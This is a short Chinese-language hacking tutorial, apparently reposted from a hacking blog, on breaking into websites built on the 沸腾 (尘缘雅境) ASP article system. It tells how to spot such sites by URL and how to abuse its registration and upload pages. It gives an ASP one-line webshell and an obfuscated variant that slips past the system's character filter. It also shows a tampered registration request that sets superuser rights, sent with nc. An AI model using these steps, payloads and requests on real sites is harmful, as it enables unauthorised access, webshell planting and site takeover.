沸腾就是以前的尘缘雅境图文系统,下面两个后台就是沸腾:

沸腾(尘缘雅境)漏洞http://back.waitalone.cn/

沸腾(尘缘雅境)漏洞http://back.waitalone.cn/

1、见到ReadNews.asp?NewsID=384像这样的网址就应该联想到沸腾文章系统

2、admin/adduser.asp注册会员的地址,注册会员了后可以在地址upme.htm上传RAR文件抓包获取upme.asp地址,然后用网站猎手的双文件欺骗功能进行上传。(明小子不行必须是网站猎手才行)

3、注册会员后通过发表文章在标题处插入<%execute request("value")%>,然后调用admin/createasp.asp,最后连接lastnewsxp.asp一句话。

4、可以注册的站点 通过发表文章 插入图片 保存远程图片 插入一句话

下面是一句话木马代码 因为沸腾系统过滤了 一些特殊的字符 所以一句话木马需要变形

<%
       response.write "<% execute request("""
       response.write "value"") "
       response.write "%"&">"
%>

(在上传图片的地方可以插入存在的URL地址,不过 他会自做聪明的给我们保留在本地。)

5、地址后面加上/admin/adduser.asp,正常注册

打开WsockExpert抓包:

username=xiaomeng&passwd=woaini&passwd2=woaini&question=xiaomeng&answer=woaini&fullname=woai&depid=1&sex=%CF%C8%C9%FA&birthyear=1950&birthmonth=1&birthday=1&tel=sdfsdf&email=fdsfs@1fd.com&photo=&content=fdsfds&purview=1&oskey=selfreg?level=1&jingyong=0&cmdOk=+%C8%B7+%B6%A8+

以上部分内容改为:

purview=99999&oskey=super&reglevel=1&cmdOk=+%C8%B7+%B6%A8+

还要把改username,否则一会用nc提交它会说已被注册了

打开cmd,用nc提交
nc IP.URL 80<1.txt

6、admin/uploadfaceok.asp直接上传,如不能直接上传就注册会员后抓包上传。

原文地址:http://www.hackseo.net/post/59.html